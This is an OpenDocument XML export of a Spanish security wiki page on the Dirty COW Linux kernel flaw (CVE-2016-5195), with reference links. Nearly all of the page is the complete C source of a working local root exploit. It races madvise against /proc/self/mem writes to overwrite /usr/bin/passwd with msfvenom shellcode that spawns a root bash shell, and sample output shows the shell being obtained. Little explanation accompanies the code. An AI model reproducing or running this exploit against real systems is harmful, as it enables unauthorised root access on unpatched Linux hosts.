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exploits:dirty_cow"/><text:bookmark-start text:name="__RefHeading___dirty_cow_1"/><text:bookmark-start text:name="dirty_cow"/>Dirty COW<text:bookmark-end text:name="__RefHeading___dirty_cow_1"/><text:bookmark-end text:name="dirty_cow"/></text:h>
      <text:p text:style-name="Text_20_body"><text:span text:style-name="Strong_20_Emphasis">CVE-2016-5195</text:span> <text:a xlink:type="simple" xlink:href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5195" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-51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* (un)comment correct payload first (x86 or x64)!<text:line-break/>* <text:line-break/>* $ gcc cowroot.c -o cowroot -pthread<text:line-break/>* $ ./cowroot<text:line-break/>* DirtyCow root privilege escalation<text:line-break/>* Backing up /usr/bin/passwd.. to /tmp/bak<text:line-break/>* Size of binary: 57048<text:line-break/>* Racing, this may take a while..<text:line-break/>* /usr/bin/passwd is overwritten<text:line-break/>* Popping root shell.<text:line-break/>* Don't forget to restore /tmp/bak<text:line-break/>* thread stopped<text:line-break/>* thread stopped<text:line-break/>* root@box:/root/cow# id<text:line-break/>* uid=0(root) gid=1000(foo) groups=1000(foo)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ys/mman.h&gt;</text:span><text:line-break/><text:span text:style-name="highlight_co2">#include &lt;fcntl.h&gt;</text:span><text:line-break/><text:span text:style-name="highlight_co2">#include &lt;pthread.h&gt;</text:span><text:line-break/><text:span text:style-name="highlight_co2">#include &lt;string.h&gt;</text:span><text:line-break/><text:span text:style-name="highlight_co2">#include &lt;unistd.h&gt;</text:span><text:line-break/> <text:line-break/><text:span text:style-name="highlight_kw4">void</text:span> <text:span text:style-name="highlight_sy2">*</text:span>map<text:span text:style-name="highlight_sy4">;</text:span><text:line-break/><text:span text:style-name="highlight_kw4">int</text:span> f<text:span text:style-name="highlight_sy4">;</text:span><text:line-break/><text:span text:style-name="highlight_kw4">int</text:span> stop <text:span text:style-name="highlight_sy1">=</text:span> <text:span text:style-name="highlight_nu0">0</text:span><text:span text:style-name="highlight_sy4">;</text:span><text:line-break/><text:span text:style-name="highlight_kw4">struct</text:span> stat st<text:span text:style-name="highlight_sy4">;</text:span><text:line-break/><text:span text:style-name="highlight_kw4">char</text:span> <text:span text:style-name="highlight_sy2">*</text:span>name<text:span text:style-name="highlight_sy4">;</text:span><text:line-break/>pthread_t pth1,pth2,pth3<text:span text:style-name="highlight_sy4">;</text:span><text:line-break/> <text:line-break/><text:span text:style-name="highlight_co1">// change if no permissions to read</text:span><text:line-break/><text:span text:style-name="highlight_kw4">char</text:span> suid_binary<text:span text:style-name="highlight_br0">[</text:span><text:span text:style-name="highlight_br0">]</text:span> <text:span text:style-name="highlight_sy1">=</text:span> <text:span text:style-name="highlight_st0">"/usr/bin/passwd"</text:span><text:span text:style-name="highlight_sy4">;</text:span><text:line-break/> <text:line-break/><text:span text:style-name="highlight_coMULTI">/*<text:line-break/>* $ msfvenom -p linux/x64/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i<text:line-break/>*/</text:span> <text:line-break/><text:span text:style-name="highlight_kw4">unsigned</text:span> <text:span text:style-name="highlight_kw4">char</text:span> sc<text:span text:style-name="highlight_br0">[</text:span><text:span text:style-name="highlight_br0">]</text:span> <text:span text:style-name="highlight_sy1">=</text:span> <text:span text:style-name="highlight_br0">{</text:span><text:line-break/><text:s text:c="2"/><text:span text:style-name="highlight_nu12">0x7f</text:span>, <text:span text:style-name="highlight_nu12">0x45</text:span>, <text:span text:style-name="highlight_nu12">0x4c</text:span>, <text:span text:style-name="highlight_nu12">0x46</text:span>, <text:span text:style-name="highlight_nu12">0x02</text:span>, <text:span text:style-name="highlight_nu12">0x01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2</text:span>, <text:span text:style-name="highlight_nu12">0x00</text:span>, <text:span text:style-name="highlight_nu12">0x3e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78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38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7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b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ea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1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48</text:span>, <text:span text:style-name="highlight_nu12">0x31</text:span>, <text:span text:style-name="highlight_nu12">0xff</text:span>, <text:span text:style-name="highlight_nu12">0x6a</text:span>, <text:span text:style-name="highlight_nu12">0x69</text:span>, <text:span text:style-name="highlight_nu12">0x58</text:span>, <text:span text:style-name="highlight_nu12">0x0f</text:span>, <text:span text:style-name="highlight_nu12">0x05</text:span>, <text:span text:style-name="highlight_nu12">0x6a</text:span>, <text:span text:style-name="highlight_nu12">0x3b</text:span>, <text:span text:style-name="highlight_nu12">0x58</text:span>, <text:span text:style-name="highlight_nu12">0x99</text:span>,<text:line-break/><text:s text:c="2"/><text:span text:style-name="highlight_nu12">0x48</text:span>, <text:span text:style-name="highlight_nu12">0xbb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73</text:span>, <text:span text:style-name="highlight_nu12">0x68</text:span>, <text:span text:style-name="highlight_nu12">0x00</text:span>, <text:span text:style-name="highlight_nu12">0x53</text:span>, <text:span text:style-name="highlight_nu12">0x48</text:span>,<text:line-break/><text:s text:c="2"/><text:span text:style-name="highlight_nu12">0x89</text:span>, <text:span text:style-name="highlight_nu12">0xe7</text:span>, <text:span text:style-name="highlight_nu12">0x68</text:span>, <text:span text:style-name="highlight_nu12">0x2d</text:span>, <text:span text:style-name="highlight_nu12">0x63</text:span>, <text:span text:style-name="highlight_nu12">0x00</text:span>, <text:span text:style-name="highlight_nu12">0x00</text:span>, <text:span text:style-name="highlight_nu12">0x48</text:span>, <text:span text:style-name="highlight_nu12">0x89</text:span>, <text:span text:style-name="highlight_nu12">0xe6</text:span>, <text:span text:style-name="highlight_nu12">0x52</text:span>, <text:span text:style-name="highlight_nu12">0xe8</text:span>,<text:line-break/><text:s text:c="2"/><text:span text:style-name="highlight_nu12">0x0a</text:span>, <text:span text:style-name="highlight_nu12">0x00</text:span>, <text:span text:style-name="highlight_nu12">0x00</text:span>, <text:span text:style-name="highlight_nu12">0x00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62</text:span>, <text:span text:style-name="highlight_nu12">0x61</text:span>, <text:span text:style-name="highlight_nu12">0x73</text:span>,<text:line-break/><text:s text:c="2"/><text:span text:style-name="highlight_nu12">0x68</text:span>, <text:span text:style-name="highlight_nu12">0x00</text:span>, <text:span text:style-name="highlight_nu12">0x56</text:span>, <text:span text:style-name="highlight_nu12">0x57</text:span>, <text:span text:style-name="highlight_nu12">0x48</text:span>, <text:span text:style-name="highlight_nu12">0x89</text:span>, <text:span text:style-name="highlight_nu12">0xe6</text:span>, <text:span text:style-name="highlight_nu12">0x0f</text:span>, <text:span text:style-name="highlight_nu12">0x05</text:span><text:line-break/><text:span text:style-name="highlight_br0">}</text:span><text:span text:style-name="highlight_sy4">;</text:span><text:line-break/><text:span text:style-name="highlight_kw4">unsigned</text:span> <text:span text:style-name="highlight_kw4">int</text:span> sc_len <text:span text:style-name="highlight_sy1">=</text:span> <text:span text:style-name="highlight_nu0">177</text:span><text:span text:style-name="highlight_sy4">;</text:span><text:line-break/> <text:line-break/><text:span text:style-name="highlight_coMULTI">/*<text:line-break/>* $ msfvenom -p linux/x86/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i<text:line-break/>unsigned char sc[] = {<text:line-break/><text:s text:c="2"/>0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,<text:line-break/><text:s text:c="2"/>0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00,<text:line-break/><text:s text:c="2"/>0x54, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<text:line-break/><text:s text:c="2"/>0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x01, 0x00, 0x00, 0x00,<text:line-break/><text:s text:c="2"/>0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<text:line-break/><text:s text:c="2"/>0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0x88, 0x00, 0x00, 0x00,<text:line-break/><text:s text:c="2"/>0xbc, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,<text:line-break/><text:s text:c="2"/>0x31, 0xdb, 0x6a, 0x17, 0x58, 0xcd, 0x80, 0x6a, 0x0b, 0x58, 0x99, 0x52,<text:line-break/><text:s text:c="2"/>0x66, 0x68, 0x2d, 0x63, 0x89, 0xe7, 0x68, 0x2f, 0x73, 0x68, 0x00, 0x68,<text:line-break/><text:s text:c="2"/>0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x52, 0xe8, 0x0a, 0x00, 0x00, 0x00,<text:line-break/><text:s text:c="2"/>0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, 0x68, 0x00, 0x57, 0x53,<text:line-break/><text:s text:c="2"/>0x89, 0xe1, 0xcd, 0x80<text:line-break/>};<text:line-break/>unsigned int sc_len = 136;<text:line-break/>*/</text:span><text:line-break/> <text:line-break/><text:span text:style-name="highlight_kw4">void</text:span> <text:span text:style-name="highlight_sy2">*</text:span>madvise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c<text:span text:style-name="highlight_sy2">+</text:span><text:span text:style-name="highlight_sy1">=</text:span>madvise<text:span text:style-name="highlight_br0">(</text:span>map,<text:span text:style-name="highlight_nu0">100</text:span>,MADV_DONTNEED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procselfmem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f<text:span text:style-name="highlight_sy1">=</text:span>open<text:span text:style-name="highlight_br0">(</text:span><text:span text:style-name="highlight_st0">"/proc/self/mem"</text:span>,O_RDWR<text:span text:style-name="highlight_br0">)</text:span>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lseek<text:span text:style-name="highlight_br0">(</text:span>f,map,<text:span text:style-name="highlight_kw2">SEEK_SET</text:span><text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy4">;</text:span><text:line-break/><text:s text:c="8"/>c<text:span text:style-name="highlight_sy2">+</text:span><text:span text:style-name="highlight_sy1">=</text:span>write<text:span text:style-name="highlight_br0">(</text:span>f, str, sc_len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waitForWrite<text:span text:style-name="highlight_br0">(</text:span><text:span text:style-name="highlight_kw4">void</text:span> <text:span text:style-name="highlight_sy2">*</text:span>arg<text:span text:style-name="highlight_br0">)</text:span> <text:span text:style-name="highlight_br0">{</text:span><text:line-break/><text:s text:c="4"/><text:span text:style-name="highlight_kw4">char</text:span> buf<text:span text:style-name="highlight_br0">[</text:span>sc_len<text:span text:style-name="highlight_br0">]</text:span><text:span text:style-name="highlight_sy4">;</text:span><text:line-break/> <text:line-break/><text:s text:c="4"/><text:span text:style-name="highlight_kw1">for</text:span><text:span text:style-name="highlight_br0">(</text:span><text:span text:style-name="highlight_sy4">;;</text:span><text:span text:style-name="highlight_br0">)</text:span> <text:span text:style-name="highlight_br0">{</text:span><text:line-break/><text:s text:c="8"/><text:span text:style-name="highlight_kw4">FILE</text:span> <text:span text:style-name="highlight_sy2">*</text:span>fp <text:span text:style-name="highlight_sy1">=</text:span> <text:span text:style-name="highlight_kw3">fopen</text:span><text:span text:style-name="highlight_br0">(</text:span>suid_binary, <text:span text:style-name="highlight_st0">"rb"</text:span><text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy4">;</text:span><text:line-break/> <text:line-break/><text:s text:c="8"/><text:span text:style-name="highlight_kw3">fread</text:span><text:span text:style-name="highlight_br0">(</text:span>buf, sc_len, <text:span text:style-name="highlight_nu0">1</text:span>, fp<text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy4">;</text:span><text:line-break/> <text:line-break/><text:s text:c="8"/><text:span text:style-name="highlight_kw1">if</text:span><text:span text:style-name="highlight_br0">(</text:span><text:span text:style-name="highlight_kw3">memcmp</text:span><text:span text:style-name="highlight_br0">(</text:span>buf, sc, sc_len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s text:c="12"/><text:span text:style-name="highlight_kw3">printf</text:span><text:span text:style-name="highlight_br0">(</text:span><text:span text:style-name="highlight_st0">"%s is overwritten<text:span text:style-name="highlight_es1">\n</text:span>"</text:span>, suid_binary<text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy4">;</text:span><text:line-break/><text:s text:c="12"/><text:span text:style-name="highlight_kw1">break</text:span><text:span text:style-name="highlight_sy4">;</text:span><text:line-break/><text:s text:c="8"/><text:span text:style-name="highlight_br0">}</text:span><text:line-break/> <text:line-break/><text:s text:c="8"/><text:span text:style-name="highlight_kw3">fclose</text:span><text:span text:style-name="highlight_br0">(</text:span>fp<text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy4">;</text:span><text:line-break/><text:s text:c="8"/>sleep<text:span text:style-name="highlight_br0">(</text:span><text:span text:style-name="highlight_nu0">1</text:span><text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy4">;</text:span><text:line-break/><text:s text:c="4"/><text:span text:style-name="highlight_br0">}</text:span><text:line-break/> <text:line-break/><text:s text:c="4"/>stop <text:span text:style-name="highlight_sy1">=</text:span> <text:span text:style-name="highlight_nu0">1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Popping root shell.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Don't forget to restore /tmp/bak<text:span text:style-name="highlight_es1">\n</text:span>"</text:span><text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy4">;</text:span><text:line-break/> <text:line-break/><text:s text:c="4"/><text:span text:style-name="highlight_kw3">system</text:span><text:span text:style-name="highlight_br0">(</text:span>suid_binary<text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy4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,<text:span text:style-name="highlight_kw4">char</text:span> <text:span text:style-name="highlight_sy2">*</text:span>argv<text:span text:style-name="highlight_br0">[</text:span><text:span text:style-name="highlight_br0">]</text:span><text:span text:style-name="highlight_br0">)</text:span> <text:span text:style-name="highlight_br0">{</text:span><text:line-break/><text:s text:c="4"/><text:span text:style-name="highlight_kw4">char</text:span> <text:span text:style-name="highlight_sy2">*</text:span>backup<text:span text:style-name="highlight_sy4">;</text:span><text:line-break/> <text:line-break/><text:s text:c="4"/><text:span text:style-name="highlight_kw3">printf</text:span><text:span text:style-name="highlight_br0">(</text:span><text:span text:style-name="highlight_st0">"DirtyCow root privilege escalation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Backing up %s.. to /tmp/bak<text:span text:style-name="highlight_es1">\n</text:span>"</text:span>, suid_binary<text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy4">;</text:span><text:line-break/> <text:line-break/><text:s text:c="4"/>asprintf<text:span text:style-name="highlight_br0">(</text:span><text:span text:style-name="highlight_sy3">&amp;</text:span>backup, <text:span text:style-name="highlight_st0">"cp %s /tmp/bak"</text:span>, suid_binary<text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy4">;</text:span><text:line-break/><text:s text:c="4"/><text:span text:style-name="highlight_kw3">system</text:span><text:span text:style-name="highlight_br0">(</text:span>backup<text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy4">;</text:span><text:line-break/> <text:line-break/><text:s text:c="4"/>f <text:span text:style-name="highlight_sy1">=</text:span> open<text:span text:style-name="highlight_br0">(</text:span>suid_binary,O_RDONLY<text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy4">;</text:span><text:line-break/><text:s text:c="4"/>fstat<text:span text:style-name="highlight_br0">(</text:span>f,<text:span text:style-name="highlight_sy3">&amp;</text:span>st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Size of binary: %d<text:span text:style-name="highlight_es1">\n</text:span>"</text:span>, st.<text:span text:style-name="highlight_me1">st_size</text:span><text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy4">;</text:span><text:line-break/> <text:line-break/><text:s text:c="4"/><text:span text:style-name="highlight_kw4">char</text:span> payload<text:span text:style-name="highlight_br0">[</text:span>st.<text:span text:style-name="highlight_me1">st_size</text:span><text:span text:style-name="highlight_br0">]</text:span><text:span text:style-name="highlight_sy4">;</text:span><text:line-break/><text:s text:c="4"/><text:span text:style-name="highlight_kw3">memset</text:span><text:span text:style-name="highlight_br0">(</text:span>payload, <text:span text:style-name="highlight_nu12">0x90</text:span>, st.<text:span text:style-name="highlight_me1">st_size</text:span><text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy4">;</text:span><text:line-break/><text:s text:c="4"/><text:span text:style-name="highlight_kw3">memcpy</text:span><text:span text:style-name="highlight_br0">(</text:span>payload, sc, sc_len<text:span text:style-name="highlight_sy2">+</text:span><text:span text:style-name="highlight_nu0">1</text:span><text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy4">;</text:span><text:line-break/> <text:line-break/><text:s text:c="4"/>map <text:span text:style-name="highlight_sy1">=</text:span> mmap<text:span text:style-name="highlight_br0">(</text:span><text:span text:style-name="highlight_kw2">NULL</text:span>,st.<text:span text:style-name="highlight_me1">st_size</text:span>,PROT_READ,MAP_PRIVATE,f,<text:span text:style-name="highlight_nu0">0</text:span>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Racing, this may take a while..<text:span text:style-name="highlight_es1">\n</text:span>"</text:span><text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy4">;</text:span><text:line-break/> <text:line-break/><text:s text:c="4"/>pthread_create<text:span text:style-name="highlight_br0">(</text:span><text:span text:style-name="highlight_sy3">&amp;</text:span>pth1, <text:span text:style-name="highlight_kw2">NULL</text:span>, <text:span text:style-name="highlight_sy3">&amp;</text:span>madviseThread, suid_binary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2, <text:span text:style-name="highlight_kw2">NULL</text:span>, <text:span text:style-name="highlight_sy3">&amp;</text:span>procselfmemThread, payload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3, <text:span text:style-name="highlight_kw2">NULL</text:span>, <text:span text:style-name="highlight_sy3">&amp;</text:span>waitForWrite, <text:span text:style-name="highlight_kw2">NULL</text:span><text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy4">;</text:span><text:line-break/> <text:line-break/><text:s text:c="4"/>pthread_join<text:span text:style-name="highlight_br0">(</text:span>pth3, <text:span text:style-name="highlight_kw2">NULL</text:span><text:span text:style-name="highlight_br0">)</text:span>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exploit-db.com/exploits/40616/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.exploit-db.com/exploits/40616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_-LXi9Isxb8" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.youtube.com/watch?v=_-LXi9Isxb8</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content_Last"> <text:a xlink:type="simple" xlink:href="http://www.elladodelmal.com/2016/10/como-convertirse-en-root-en-un-gnulinux.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://www.elladodelmal.com/2016/10/como-convertirse-en-root-en-un-gnulinux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Copy-on-write" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://es.wikipedia.org/wiki/Copy-on-wr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8::12:55</meta:creation-date>
    <dc:creator>Generated</dc:creator>
    <dc:date>2026-02-20T08::12:55</dc:date>
    <dc:language>en-US</dc:language>
    <meta:editing-cycles>1</meta:editing-cycles>
    <meta:editing-duration>PT0S</meta:editing-duration>
    <dc:title>seguridad:enlaces:exploits:dirty_cow</dc:title>
  </office:meta>
</office:document-meta>
</file>